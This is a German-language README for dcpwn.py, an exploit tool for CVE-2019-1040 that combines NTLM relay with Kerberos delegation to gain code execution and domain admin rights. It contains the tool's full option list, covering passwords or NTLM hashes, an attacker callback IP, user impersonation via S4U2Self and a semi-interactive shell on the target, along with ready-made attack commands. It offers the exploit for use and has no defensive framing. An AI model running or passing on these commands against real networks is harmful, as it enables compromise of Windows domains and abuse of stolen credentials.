
CVE-2019-1040 mit Kerberos-Delegierung
Tolle ausführliche Beschreibung! Ausnutzung von CVE-2019-1040 – Kombination von Relay-Schwachstellen für RCE und Domain Admin .
Daher habe ich dcpwn.py zur einfachen Nutzung geschrieben.
Diese Tools benötigen impacket. Sie können es mit pip installieren:
pip install impacket
usage: dcpwn.py [-h] [-u USERNAME] [-p PASSWORD] [--hashes HASHES] -d DOMAIN
[--smb-port [destination port]] --callback-ip CALLBACK_IP
--ldaps LDAPS --dc-ip DC_IP [--timeout TIMEOUT]
[--impersonate IMPERSONATE] -t Target [-share SHARE]
[--command [COMMAND [COMMAND ...]]] [--debug]
CVE-2019-1040 mit Kerberos-Delegation
optionale Argumente:
-h, --help Zeigt diese Hilfemeldung an und beendet das Programm
-u USERNAME, --user USERNAME
Benutzername für die Authentifizierung
-p PASSWORD, --password PASSWORD
Passwort für die Authentifizierung, wird zur Eingabe aufgefordert, falls nicht angegeben und keine NT:NTLM-Hashes bereitgestellt werden
--hashes HASHES LM:NTLM-Hashes
-d DOMAIN, --domain DOMAIN
Domäne, in der sich der Benutzer befindet (FQDN oder NETBIOS-Domänenname)
--smb-port [destination port]
Zielport für die Verbindung zum SMB-Server
--callback-ip CALLBACK_IP
Angreifer-Hostname oder IP
--ldaps LDAPS Hostname oder LDAPS-Server
--dc-ip DC_IP IP-Adresse des Domänencontrollers
--timeout TIMEOUT Zeitüberschreitung in Sekunden
--impersonate IMPERSONATE
Ziel-Benutzername, der imitiert werden soll (über S4U2Self) für die Abfrage des ST. Beachten Sie, dass dies nur funktioniert, wenn die in diesem Skript angegebene Identität für die Delegierung an den angegebenen SPN erlaubt ist
-t Target, --target Target
Hostname/IP des Zielservers
-share SHARE Freigabe, von der die Ausgabe abgerufen wird (Standard ADMIN$)
--command [COMMAND [COMMAND ...]]
Befehl, der auf dem Ziel ausgeführt werden soll. Wenn leer, wird eine halb-interaktive Shell gestartet
--debug Aktiviert Debug-Ausgabe
Beispiel:
sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target

Wenn Sie einen Befehl wie cmd.exe ausführen möchten. verwenden Sie --command
Beispiel:
sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target --command 'cmd.exe'
Wenn Sie einen bestimmten Benutzer imitieren möchten, verwenden Sie --impersonate
sudo python dcpwn.py -u user -p pass -d domain.com --callback-ip attackterip --ldaps ldapsip --dc-ip DCip -t target --impersonate someone